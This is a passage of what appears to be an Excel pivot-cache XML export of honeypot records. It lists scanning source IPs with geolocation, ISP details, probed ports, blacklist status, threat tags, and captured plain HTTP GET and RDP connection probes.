TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5900&amp;&amp;80&amp;&amp;53&amp;&amp;443&amp;&amp;1080&amp;&amp;9100&amp;&amp;389&amp;&amp;49942&amp;&amp;23"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:9d5d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3732"/>
    <x v="3732"/>
    <s v="NA&amp;&amp;114-33-143-13.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T16:37:40"/>
    <d v="2024-09-04T11:35:00"/>
    <d v="2025-04-01T16:37:40"/>
    <n v="408"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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7221:8f0d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3733"/>
    <x v="3733"/>
    <s v="NA&amp;&amp;125-228-89-19.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T16:25:27"/>
    <d v="2023-07-27T15:53:37"/>
    <d v="2025-04-01T16:25:27"/>
    <n v="548"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;64077&amp;&amp;23&amp;&amp;49928&amp;&amp;51958&amp;&amp;9100&amp;&amp;80"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:5913"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3734"/>
    <x v="3734"/>
    <s v="dcm1-133-204-55-91.tky.mesh.ad.jp"/>
    <x v="0"/>
    <d v="2025-04-01T16:03:47"/>
    <d v="2025-04-01T16:03:47"/>
    <d v="2025-04-01T16:03:47"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-0001"/>
    <s v="35.694"/>
    <s v="139.754"/>
    <s v="2518"/>
    <s v="BIGLOBE BIGLOBE Inc."/>
    <s v="BIGLOBE Inc."/>
    <s v="corporate"/>
    <s v="NEC BIGLOBE Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns02.mesh.ad.jp', 'ns03.mesh.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/12/31)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:85cc:375b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3735"/>
    <x v="3735"/>
    <s v="host-82-48-173-156.retail.telecomitalia.it"/>
    <x v="0"/>
    <d v="2025-04-01T15:53:27"/>
    <d v="2025-03-31T10:29:38"/>
    <d v="2025-04-01T15:53:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="23&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="72"/>
    <s v="Campania"/>
    <s v="Naples"/>
    <s v="Capri"/>
    <s v="3180630"/>
    <s v="NA"/>
    <s v="40.5507"/>
    <s v="14.2426"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="Telecom Italia S.p.A. TIN EASY LITE"/>
    <s v="residential"/>
    <s v="INTERBUSINESS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-01-29 00:00:00"/>
    <s v="2026-01-29 00:00:00"/>
    <s v="2025-02-14 00:53:45"/>
    <s v="ns.telecomitalia.it_x000a_  dnsts.interbusiness.it"/>
    <s v="Telecom Italia s.p.a."/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5230:ad9c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3736"/>
    <x v="3736"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:50:19"/>
    <d v="2023-08-07T12:01:00"/>
    <d v="2025-04-01T15:50:19"/>
    <n v="1017"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H44&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;44393&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:7363"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3737"/>
    <x v="3737"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:46:49"/>
    <d v="2024-11-21T13:32:41"/>
    <d v="2025-04-01T15:46:49"/>
    <n v="67"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_RDP_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_RDP_H9"/>
    <s v="3389&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Erie"/>
    <s v="Buffalo (Downtown)"/>
    <s v="5110629"/>
    <s v="14202"/>
    <s v="42.893"/>
    <s v="-78.8753"/>
    <s v="36352"/>
    <s v="HostPapa"/>
    <s v="HostPapa"/>
    <s v="hosting"/>
    <s v="HostPapa"/>
    <s v="2013-08-16"/>
    <s v="CC-16"/>
    <s v="2024-02-02"/>
    <s v="connection&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:175f:baba"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3738"/>
    <x v="3738"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:38:51"/>
    <d v="2025-03-05T12:39:37"/>
    <d v="2025-04-01T15:38:51"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay Static"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-Static"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:5715"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3739"/>
    <x v="3739"/>
    <s v="220-134-124-198.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:36:00"/>
    <d v="2023-07-25T00:36:26"/>
    <d v="2025-04-01T15:36:00"/>
    <n v="2277"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H27&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;17597&amp;&amp;23&amp;&amp;NA"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:7cc6"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3740"/>
    <x v="3740"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:28:38"/>
    <d v="2025-04-01T15:28:38"/>
    <d v="2025-04-01T15:28:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:bd1f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3741"/>
    <x v="3741"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:27:14"/>
    <d v="2025-04-01T12:49:39"/>
    <d v="2025-04-01T15:27:14"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b60:6d10"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3742"/>
    <x v="3742"/>
    <s v="NA&amp;&amp;220-132-86-71.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T15:25:00"/>
    <d v="2023-12-05T20:07:00"/>
    <d v="2025-04-01T15:25:00"/>
    <n v="552"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;34520&amp;&amp;23&amp;&amp;43325&amp;&amp;9100&amp;&amp;80&amp;&amp;46490&amp;&amp;51300"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc84:5647"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3743"/>
    <x v="3743"/>
    <s v="122-117-93-26.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T15:17:49"/>
    <d v="2023-12-03T10:31:00"/>
    <d v="2025-04-01T15:17:49"/>
    <n v="574"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MT-CPA_H12"/>
    <s v="10559&amp;&amp;36450&amp;&amp;23&amp;&amp;38750&amp;&amp;9100&amp;&amp;80&amp;&amp;60057&amp;&amp;60074&amp;&amp;60100&amp;&amp;60113"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET"/>
